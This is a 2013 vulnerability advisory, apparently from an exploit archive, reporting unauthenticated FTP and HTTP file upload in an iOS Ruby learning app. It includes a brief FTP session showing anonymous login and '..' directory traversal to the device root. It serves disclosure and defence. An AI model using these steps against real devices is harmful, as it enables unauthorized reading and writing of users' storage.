Exploit the possiblities

Ruby Programming Language 1.7 File Upload

Ruby Programming Language 1.7 File Upload
Posted Sep 12, 2013
Authored by Larry W. Cashdollar

Ruby Programming Language version 1.7 for iOS suffers from an unauthenticated file upload vulnerability.

tags | exploit, file upload, ruby
systems | apple, ios
MD5 | 56a97b4d5b088b633aad2c86720b9a70

Ruby Programming Language 1.7 File Upload

Change Mirror Download
TITLE: Unauthenticated Remote File Upload via HTTP for ruby-Programming language 1.7 on iOS

Date: 8/1/2013
Author: Larry W. Cashdollar, @_larry0

Download:
https://itunes.apple.com/us/app/ruby-programming-language/id581732143?mt=8&ls=1
http://www.tayutec.com/indexen.html
Description: "This is an ios ruby app,you can learn,run,share ruby script. Features : 
Autocomplate.
Auto Indent.
Code color.
In(the built-in browser or the txt editor),Select the text to run.
Horizontal screen development.
Code templates, the contents of the new file is copy from contents of the template file.
You can enter ruby code by keyboard or two-dimensional code, and then you can execut the ruby code,support the gets function.
You can adjust the code color and font size, and support to move the cursor left and right and up and down , easy to read and write.
You can upload learning materials to the local on the computer via wifi, support http and ftp two upload ways. The file system supports txt, pdf, chm, mp3,m4v,zip, gif, png, html, rb, doc ...
You can find learning materials by the built-in browser.
You can save ruby code and learning materials, and can be modified to the save file and delete the save file .
You can control the background image and color, and execution voice, background animation, text color and shadow, switch interface animation, the number and the order of the main interface of the tab bar to create your learning software.
You can Learn ruby knowledge, the system provides some basic learning materials.
You can use ruby code or learning materials to generate two-dimensional code , for easy sharing .
You can share code by Email,Weibo,Twitter,Facebook.
You can use the counter,light in the Setting tab."
Vulnerabilities: 'iOSftp' & http unauthenticated file uplolads. The application is sandboxed, but any remote user can read/write to the devices storage.

The uploaded content is served out of the http servers directory. While the http server doesn't process server side scripts it is possible to upload and serve malicious / illegal content. 

I would think it's also possible to fill up the devices storage as well but did not test it.
larry$ ftp 192.168.0.31 10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password:
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /private/var/mobile/Applications/0F96EC13-FD37-4A0D-A054-6A4A93F8DC5A/Documents/ftp *
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp>
* You also get path disclosure.
HTTP server listening on port 8080 allows arbitrary file writes to storage.
You can create directories out side the upload path through the file upload web interface and the .. bug. Because the application is sandbox I was unable to overwtite application executables and components so impact is limited. As stated above you can serve malicious content (javascript/html) via http. 
 
Vendor: Notified 8/1/2013, https://twitter.com/tayutec
Advisory: http://vapid.dhs.org/advisories/ruby-ios-Huang-XiaoWen.html

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    8 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close